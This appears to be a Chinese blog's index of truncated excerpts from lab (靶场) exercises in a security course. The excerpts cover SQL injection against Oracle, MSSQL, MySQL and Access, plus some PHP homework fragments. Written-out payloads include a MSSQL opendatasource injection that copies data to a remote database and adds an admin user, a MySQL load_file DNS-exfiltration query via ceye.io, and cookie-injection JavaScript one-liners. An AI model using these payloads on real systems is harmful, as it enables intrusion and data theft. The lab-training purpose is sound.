5.4.1、Oracle注入- 报错注入
首先打开靶场,发现提示需要输入id 输入一个 id=1 发现页面正常显示输入 id=1' 发现页面提示错误信息,有个 ORA-01756 考虑应该是个 Oracle 数据库使用 id=1' --+ 发现页面正常显示确定是Oracle数据库后 使用Oracle 数据库语句 查询Oracle 数据库名 发现一个BATTLE01
5.3.1、MSSQL注入 - 反弹注入
首先打开靶场,由于这是一个用opendatasource 函数将当前数据库中查询到的值返回到另一数据库中使用远程连接,连接到doufu 老师给的数据库然后添加一个账号密码都为 h4ck 的用户 并添加到管理员组在靶场中使用 120.203.13.75:8150/MSSQL/?id=2';insert into opendatabase('sqloledb',
5.2.2、MYSQL 注入 - Dns注入
打开靶场,查看php 代码 发现存在过滤,我们使用插件HACKBAR然后进入ceye.io 注册一个免费的二级域名,找到mysql的注入语句我们将得到的 mysql注入语句改造一下id=1(' 可以先在后面加个' 无效就删除) and if((select load_file(concat('\\\\',(select database())
5.2.1、MYSQL 注入 - 全方位利用
先打开靶场,查看猫舍介绍在浏览器中输入 id=1' 发现页面没有正常显示使用id=1 and 1=1 页面正常显示 使用 and 1=2 页面又没有正常显示 可以判断应该存在SQL注入漏洞使用 order by 3来查看字段 发现没有正常显示 ,将字段缩小发现页面正常显示 说明存在2个字段将两个字段显示出来
5.2.1、MYSQL 注入 - 全方位利用
首先打开靶场点开猫舍介绍。在浏览器中的 id=1 后加上一个单引号 id=1' 发现页面没有正常显示再使用 id=1 and 1=1 发现页面正常显示再次使用 id = 1 and 1=2 发现页面没有正常显示。由此可以判断,此页面应该存在SQL注入漏洞,可以使用SQL语句来进行注入使用 order by 3 语句来测试字段,发现
5.1.2、Access注入 — 偏移注入
使用 javascript:alert(document.cookie="id="+escape("105")); 查看是否存在cookie 注入回车弹出一个弹框在另一个网页中发现可以显示测试字段的个数当输入正确的字段的个数 另一个页面会显示在另一个页面输入javascript:alert(document.cookie=
5.1.1、Access注入 — Cookie注入
首先打开两次靶场传送门准备两个一模一样的网页在第一个网页中输入javascript:alert(document.cookie="id="+escape("171")); 查看是否存在cookie 注入在第一个网页中回车会弹出一个弹框然后在第二个网页中删除 id和后面的值 回车看看是否显示出一样的内容确认存在cookie注入后&nbs
[3.6、正则表达式【作业】]
<?php $file = fopen("sharedStrings.xml","r"); $test = fread($file,filesize("sharedStrings.xml")); &nb
3.5、PHP表单验证【作业】
<?php $username = $_POST['username']; $password = $_POST['password']; $n = [ '','\'',
3.4、后端开发基础PHP - PHP简介及PHP基本函数(下)【作业】
<!DOCTYPE html><html><head> <title></title></head><body> <form action="test.php" method="post">&